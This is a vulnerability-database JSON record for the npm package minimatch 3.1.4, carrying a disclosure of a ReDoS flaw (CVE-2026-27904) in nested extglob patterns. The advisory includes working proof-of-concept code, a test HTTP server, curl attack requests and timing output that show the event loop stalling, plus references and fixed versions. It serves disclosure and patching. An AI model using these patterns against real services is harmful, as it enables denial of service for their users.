{"url":"http://public2.vulnerablecode.io/api/packages/64949?format=json","purl":"pkg:npm/minimatch@3.1.4","type":"npm","namespace":"","name":"minimatch","version":"3.1.4","qualifiers":{},"subpath":"","is_vulnerable":false,"next_non_vulnerable_version":"4.2.5","latest_non_vulnerable_version":"10.2.3","affected_by_vulnerabilities":[],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22344?format=json","vulnerability_id":"VCID-kq3k-xr3z-z3c4","summary":"minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions\n### Summary\n\nNested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally.\n\n---\n\n### Details\n\nThe root cause is in `AST.toRegExpSource()` at [`src/ast.ts#L598`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/ast.ts#L598). For the `*` extglob type, the close token emitted is `)*` or `)?`, wrapping the recursive body in `(?:...)*`. When extglobs are nested, each level adds another `*` quantifier around the previous group:\n\n```typescript\n: this.type === '*' && bodyDotAllowed ? `)?`\n: `)${this.type}`\n```\n\nThis produces the following regexps:\n\n| Pattern              | Generated regex                          |\n|----------------------|------------------------------------------|\n| `*(a\\|b)`            | `/^(?:a\\|b)*$/`                          |\n| `*(*(a\\|b))`         | `/^(?:(?:a\\|b)*)*$/`                     |\n| `*(*(*(a\\|b)))`      | `/^(?:(?:(?:a\\|b)*)*)*$/`               |\n| `*(*(*(*(a\\|b))))` | `/^(?:(?:(?:(?:a\\|b)*)*)*)*$/`          |\n\nThese are textbook nested-quantifier patterns. Against an input of repeated `a` characters followed by a non-matching character `z`, V8's backtracking engine explores an exponential number of paths before returning `false`.\n\nThe generated regex is stored on `this.set` and evaluated inside `matchOne()` at [`src/index.ts#L1010`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/index.ts#L1010) via `p.test(f)`. It is reached through the standard `minimatch()` call with no configuration.\n\nMeasured times via `minimatch()`:\n\n| Pattern              | Input              | Time       |\n|----------------------|--------------------|------------|\n| `*(*(a\\|b))`         | `a` x30 + `z`      | ~68,000ms  |\n| `*(*(*(a\\|b)))`      | `a` x20 + `z`      | ~124,000ms |\n| `*(*(*(*(a\\|b))))` | `a` x25 + `z`      | ~116,000ms |\n| `*(a\\|a)`            | `a` x25 + `z`      | ~2,000ms   |\n\nDepth inflection at fixed input `a` x16 + `z`:\n\n| Depth | Pattern              | Time         |\n|-------|----------------------|--------------|\n| 1     | `*(a\\|b)`            | 0ms          |\n| 2     | `*(*(a\\|b))`         | 4ms          |\n| 3     | `*(*(*(a\\|b)))`      | 270ms        |\n| 4     | `*(*(*(*(a\\|b))))` | 115,000ms    |\n\nGoing from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.\n\n---\n\n### PoC\n\nTested on minimatch@10.2.2, Node.js 20.\n\n**Step 1 -- verify the generated regexps and timing (standalone script)**\n\nSave as `poc4-validate.mjs` and run with `node poc4-validate.mjs`:\n\n```javascript\nimport { minimatch, Minimatch } from 'minimatch'\n\nfunction timed(fn) {\n  const s = process.hrtime.bigint()\n  let result, error\n  try { result = fn() } catch(e) { error = e }\n  const ms = Number(process.hrtime.bigint() - s) / 1e6\n  return { ms, result, error }\n}\n\n// Verify generated regexps\nfor (let depth = 1; depth <= 4; depth++) {\n  let pat = 'a|b'\n  for (let i = 0; i < depth; i++) pat = `*(${pat})`\n  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()\n  console.log(`depth=${depth} \"${pat}\" -> ${re}`)\n}\n// depth=1 \"*(a|b)\"          -> /^(?:a|b)*$/\n// depth=2 \"*(*(a|b))\"       -> /^(?:(?:a|b)*)*$/\n// depth=3 \"*(*(*(a|b)))\"    -> /^(?:(?:(?:a|b)*)*)*$/\n// depth=4 \"*(*(*(*(a|b))))\" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/\n\n// Safe-length timing (exponential growth confirmation without multi-minute hang)\nconst cases = [\n  ['*(*(*(a|b)))', 15],   // ~270ms\n  ['*(*(*(a|b)))', 17],   // ~800ms\n  ['*(*(*(a|b)))', 19],   // ~2400ms\n  ['*(*(a|b))',    23],   // ~260ms\n  ['*(a|b)',      101],   // <5ms (depth=1 control)\n]\nfor (const [pat, n] of cases) {\n  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))\n  console.log(`\"${pat}\" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)\n}\n\n// Confirm noext disables the vulnerability\nconst t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))\nconsole.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)\n\n// +() is equally affected\nconst t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))\nconsole.log(`\"+(+(+(a|b)))\" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)\n```\n\nObserved output:\n```\ndepth=1 \"*(a|b)\"          -> /^(?:a|b)*$/\ndepth=2 \"*(*(a|b))\"       -> /^(?:(?:a|b)*)*$/\ndepth=3 \"*(*(*(a|b)))\"    -> /^(?:(?:(?:a|b)*)*)*$/\ndepth=4 \"*(*(*(*(a|b))))\" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/\n\"*(*(*(a|b)))\" n=15: 269ms result=false\n\"*(*(*(a|b)))\" n=17: 268ms result=false\n\"*(*(*(a|b)))\" n=19: 2408ms result=false\n\"*(*(a|b))\"    n=23: 257ms result=false\n\"*(a|b)\"       n=101: 0ms result=false\nnoext=true: 0ms (should be ~0ms)\n\"+(+(+(a|b)))\" n=18: 6300ms result=false\n```\n\n**Step 2 -- HTTP server (event loop starvation proof)**\n\nSave as `poc4-server.mjs`:\n\n```javascript\nimport http from 'node:http'\nimport { URL } from 'node:url'\nimport { minimatch } from 'minimatch'\n\nconst PORT = 3001\nhttp.createServer((req, res) => {\n  const url     = new URL(req.url, `http://localhost:${PORT}`)\n  const pattern = url.searchParams.get('pattern') ?? ''\n  const path    = url.searchParams.get('path') ?? ''\n\n  const start  = process.hrtime.bigint()\n  const result = minimatch(path, pattern)\n  const ms     = Number(process.hrtime.bigint() - start) / 1e6\n\n  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern=\"${pattern}\" path=\"${path.slice(0,30)}\"`)\n  res.writeHead(200, { 'Content-Type': 'application/json' })\n  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\\n')\n}).listen(PORT, () => console.log(`listening on ${PORT}`))\n```\n\nTerminal 1 -- start the server:\n```\nnode poc4-server.mjs\n```\n\nTerminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:\n```\ncurl \"http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz\" &\n```\n\nTerminal 3 -- send a benign request while the attack is in-flight:\n```\ncurl -w \"\\ntime_total: %{time_total}s\\n\" \"http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz\"\n```\n\n**Observed output -- Terminal 2 (attack):**\n```\n{\"result\":false,\"ms\":\"64149\"}\n```\n\n**Observed output -- Terminal 3 (benign, concurrent):**\n```\n{\"result\":false,\"ms\":\"0\"}\n\ntime_total: 63.022047s\n```\n\n**Terminal 1 (server log):**\n```\n[2026-02-20T09:41:17.624Z] pattern=\"*(*(*(a|b)))\" path=\"aaaaaaaaaaaaaaaaaaaz\"\n[2026-02-20T09:42:21.775Z] done in 64149ms result=false\n[2026-02-20T09:42:21.779Z] pattern=\"*(a|b)\" path=\"aaaz\"\n[2026-02-20T09:42:21.779Z] done in 0ms result=false\n```\n\nThe server reports `\"ms\":\"0\"` for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second `time_total` is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.\n\nNote: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.\n\n---\n\n### Impact\n\nAny context where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.\n\nDepth 3 (`*(*(*(a|b)))`, 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (`*(*(a|b))`, 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.\n\n`+()` extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).\n\n**Mitigation available:** passing `{ noext: true }` to `minimatch()` disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27904.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27904.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27904","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04722","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04695","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04755","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04707","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06755","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06764","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06822","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06879","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06829","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06835","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06831","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06906","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06884","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.06899","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07474","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07214","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07369","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.0744","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07424","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07439","published_at":"2026-05-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27904"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/isaacs/minimatch","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/minimatch"},{"reference_url":"https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce"},{"reference_url":"https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T19:21:18Z/"}],"url":"https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27904","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27904"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129095","reference_id":"1129095","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1129095"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2442922","reference_id":"2442922","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2442922"},{"reference_url":"https://github.com/advisories/GHSA-23c5-xmqv-rm74","reference_id":"GHSA-23c5-xmqv-rm74","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-23c5-xmqv-rm74"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10184","reference_id":"RHSA-2026:10184","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10184"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13826","reference_id":"RHSA-2026:13826","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13826"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:4942","reference_id":"RHSA-2026:4942","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:4942"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5168","reference_id":"RHSA-2026:5168","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5168"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5665","reference_id":"RHSA-2026:5665","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5665"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6277","reference_id":"RHSA-2026:6277","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6277"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6497","reference_id":"RHSA-2026:6497","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6497"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6567","reference_id":"RHSA-2026:6567","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6567"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6568","reference_id":"RHSA-2026:6568","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6568"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7080","reference_id":"RHSA-2026:7080","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7080"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7123","reference_id":"RHSA-2026:7123","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7123"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7302","reference_id":"RHSA-2026:7302","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7302"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7310","reference_id":"RHSA-2026:7310","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7310"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7896","reference_id":"RHSA-2026:7896","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7896"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7983","reference_id":"RHSA-2026:7983","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7983"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8339","reference_id":"RHSA-2026:8339","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8339"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9711","reference_id":"RHSA-2026:9711","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9711"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9742","reference_id":"RHSA-2026:9742","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9742"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9874","reference_id":"RHSA-2026:9874","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9874"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64949?format=json","purl":"pkg:npm/minimatch@3.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/63551?format=json","purl":"pkg:npm/minimatch@4.2.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.5"},{"url":"http://public2.vulnerablecode.io/api/packages/63547?format=json","purl":"pkg:npm/minimatch@5.1.8","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.8"},{"url":"http://public2.vulnerablecode.io/api/packages/63543?format=json","purl":"pkg:npm/minimatch@6.2.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/63541?format=json","purl":"pkg:npm/minimatch@7.4.8","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.8"},{"url":"http://public2.vulnerablecode.io/api/packages/63539?format=json","purl":"pkg:npm/minimatch@8.0.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.6"},{"url":"http://public2.vulnerablecode.io/api/packages/63536?format=json","purl":"pkg:npm/minimatch@9.0.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.7"},{"url":"http://public2.vulnerablecode.io/api/packages/63533?format=json","purl":"pkg:npm/minimatch@10.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.3"}],"aliases":["CVE-2026-27904","GHSA-23c5-xmqv-rm74"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kq3k-xr3z-z3c4"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.4"}